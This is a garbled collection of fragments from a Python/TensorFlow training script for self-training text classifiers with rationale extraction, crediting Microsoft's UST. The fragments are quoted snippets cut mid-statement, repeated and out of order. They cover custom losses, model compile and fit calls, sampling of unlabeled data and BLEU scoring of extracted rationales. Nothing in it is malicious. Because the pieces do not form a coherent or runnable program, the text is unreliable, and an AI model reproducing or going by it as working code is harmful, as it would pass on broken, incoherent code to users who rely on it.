tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp'", "= {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that are not rationales", "== 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1", "UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from sklearn.utils import shuffle from transformers", "if 'rwt' in type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm'", "{} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {}", "based on validation loss best_base_model = None best_validation_loss = np.inf for counter in", "axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss},", "(probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in type_: #re-weight labels X_conf[:,0] =", "sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number of instances sampled from", "np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif", "with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights =", "test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0, 1] #fix hardcoding", "out[5] logger.info (\"Test token acc for run {} : {}\".format(counter, test_acc)) logger.info (\"Best", "max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc", "np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]}", "X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0],", "with valid_split if valid_split > 0: train_size = int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg'", "'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in", "score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_: out = model_student.predict(X_test) acc,", "0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None},", "X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids = [] attention_mask_r", "attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1", "Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X", "from {}\".format(model_file)) continue if 'mtl' in type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256)", "Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0]", "X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at the moment; choose all the", "y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus,", "attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0] if '_noexp' in type_: loss_weights", "label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append('", "y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0],", "cls = list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale", "acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1)", "'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel,", "'_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "from collections import defaultdict from sklearn.utils import shuffle from transformers import * import", "model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file loaded from {}\".format(model_file)) break elif", "= np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if", "1, 0) negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r}", "elif type_ == 'joint': # or 'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0],", "score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth = [],", "random from sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def", "X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or ('joint' in", "[y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint': # or 'joint_neg' in", "in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample", "= 0. max_best_acc = 0. val_loss = 0. if 'mtl' in type_: logger.info(\"y_test:", "logger.info (\"Evaluating confidence on {} number of instances sampled from {} unlabeled instances\".format(sample_size,", "type_: out = model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1], out[2] class_acc =", "batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1)", "tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss def", "SparseCategoricalFocalLoss import random from sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support logger =", "0, 0, 0 for i in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0", "= np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at the moment; choose all the unlabeled", "pred, truth = [], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction", "best_base_model = model best_validation_loss = val_loss[0] model = best_base_model ''' if 'mtl' in", "axis=-1) acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score:", "0.000000001) if 'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length))", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)),", "y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev", "valid_split if valid_split > 0: train_size = int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg' in", "{} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (teacher model): {} \".format(score3/len(pred)))", "logger.info(\"BLEU-3 score of rationales on test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score", "of rationales on test set (teacher model): {} \".format(score4/len(pred))) best_loss = np.inf data", "{\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size]", "101 logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale", "in range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\":", "sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg'", "0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg},", "'mtl' in type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1)", "\"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\":", "#_student = deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if", "teacher model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None,", "axis=-1) elif 'joint' in type_: out = model.predict(X_test) class_acc, test_pred, r_acc = out[0],", "'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids = []", "and dev with valid_split if valid_split > 0: train_size = int((1. - valid_split)*len(X[\"input_ids\"]))", "X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices],", "r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token", "0. best_test_acc = 0. max_test_acc = 0. max_task_acc = 0. max_best_acc = 0.", "unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if", "metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance':", "np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student =", "custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if", "word in temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p", "'joint' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices],", "(token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc)) if", "0 pred_1, pred_0, truth_1, truth_0 = 0, 0, 0, 0 for i in", "X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices],", "y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs", "len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred =", "verbose=0) elif 'joint' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)", "type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_:", "cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss", "loss_weights = None if '_noexp' in type_: loss_weights = [1.0, 0.0] else: loss_weights", "if type_ == 'decoupled' or ('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\":", "1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append('", "json import nltk import tensorflow as tf import tensorflow.keras as K import tensorflow.keras.backend", "X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig,", "''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc =", "max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme))", "in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight rationales X_conf[:,1:]", "sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in type_:", "X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs = y_val[indices] probs_rat =", "tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else:", "in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs,", "if y_test[i][j+1] == 1: #to skip evaluation of the task label temp_t.append(temp[j]) pred_1", "\".format(score4/len(pred))) data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp =", "#model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file loaded from {}\".format(model_file)) break elif 'mtl'", "score of rationales on test set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of", "unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number of", "axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc =", "0] if '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "tp, fn, fp = 0, 0, 0 pred_1, pred_0, truth_1, truth_0 = 0,", "if 'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc,", "model_task for epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_ == 'mtl':", "with strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_:", "= [1.0, 1.0, 1.0, 1.0] if '_noexp' in type_: loss_weights = [1.0, 0.0,", "in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev,", "y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5,", "[] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected:", "rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss = None if", "0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on", "\"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = {\"input_ids\":", "{\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices],", "of rationales on test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales", "np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0],", "model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc = 0.", "type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight rationales X_conf[:,1:] =", "tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text temp['truth'] = truth[i] temp['pred'] = pred[i]", "pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0] if", "replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint'", "[y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc:", "model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (student model): {}", "attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r,", "{}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3]", "X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices],", "log_rationale = (probs_rat+1e-10) if 'rwt' in type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs,", "'_neg' in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg],", "type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]},", "= model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif 'joint' in type_:", "temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001)", "cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss =", "tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss = None if 'focal' in", "len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file)", "strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_: loss_weights", "y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred", "= y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample from unlabeled set if 'uni'", "from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def", "y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc =", "= 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce", "y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student", "np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i,", "#logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_: out = model_student.predict(X_test)", "type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif 'joint'", "'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg']", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_: loss_weights", "for run {} : {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model = model", "set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number of instances", "#compute confidence on the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence", "X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:,", "np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "= SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in type_:", "= np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for i in", "cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return", "= os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info", "= SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE)", "np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: 